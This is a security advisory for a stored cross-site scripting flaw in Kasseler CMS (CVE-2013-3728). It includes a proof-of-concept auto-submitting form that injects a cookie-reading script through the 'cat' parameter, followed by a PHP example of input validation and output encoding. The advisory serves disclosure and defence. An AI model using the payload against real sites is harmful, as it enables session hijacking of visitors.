Released on: 2013-07-03
Updated on:
Affected Systems:
Kasseler CMS <= 2 r1223
Description:
--------------------------------------------------------------------------------
Bugtraq id: 60927
CVE (CAN) ID: CVE-2013-3728
Kasseler CMS is a content management system.
Kasseler CMS 2 r1223 has a stored cross-site scripting vulnerability caused by inadequate filtering of the "cat" HTTP POST parameter in the "/admin.php" script. If a remote attacker can create a directory, arbitrary HTML and script code can be injected into the application database and executed in the browser of each site visitor.
<* Source: High-Tech Bridge Security Research Lab
Link: https://www.htbridge.com/advisory/HTB23158
http://seclists.org/bugtraq/2013/Jul/26
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
<form action="http://www.example.com/admin.php?module=forum&do=admin_new_category" method="post" name="main">
<input type="hidden" name="cat" value="<script>alert(document.cookie);</script>">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Kasseler CMS
------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://diff.kasseler-cms.net/svn/patches/1232.html
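
The class of fix for the unfiltered "cat" value described above, as an added PHP example; it is not the vendor's patch and not Kasseler CMS code. The function names, the allowlist and the in-memory array standing in for the category table are assumptions made for illustration.

```php
<?php
// Hypothetical in-memory stand-in for the category table (not Kasseler's schema).
$categories = [];

// Input side: validate the POSTed "cat" value; returns the name or null if rejected.
function validate_category_name($raw): ?string
{
    if (!is_string($raw)) {
        return null; // e.g. cat[]=... arrives as an array
    }
    $name = trim($raw);
    // Allowlist of 1-64 letters, digits, spaces and some punctuation.
    // The /u flag also makes invalid UTF-8 fail the match.
    if (preg_match('/^[\p{L}\p{N} _.,&()\-]{1,64}$/u', $name) !== 1) {
        return null;
    }
    return $name;
}

// Output side, unsafe: the stored value is concatenated into markup as-is.
function render_category_unsafe(string $name): string
{
    return '<li class="category">' . $name . '</li>';
}

// Output side, safe: encode for the HTML context at the point of output.
function render_category_safe(string $name): string
{
    return '<li class="category">'
        . htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        . '</li>';
}

// Constructed sample input: the value from the test form above and a benign name.
$samples = ['<script>alert(document.cookie);</script>', 'Q&A (general)'];
foreach ($samples as $cat) {
    $clean = validate_category_name($cat);
    echo ($clean === null ? 'rejected: ' : 'accepted: ') . json_encode($cat) . "\n";
    if ($clean !== null) {
        $categories[] = $clean;
    }
}

// A row stored before validation existed still holds the raw value,
// so encoding on output is required even with input validation in place.
$categories[] = $samples[0];
foreach ($categories as $name) {
    echo 'unsafe: ' . render_category_unsafe($name) . "\n";
    echo 'safe:   ' . render_category_safe($name) . "\n";
}
```

Run with the PHP CLI: the unsafe lines reproduce the stored markup verbatim, while the safe lines show the same rows with `<`, `>` and `&` encoded as entities.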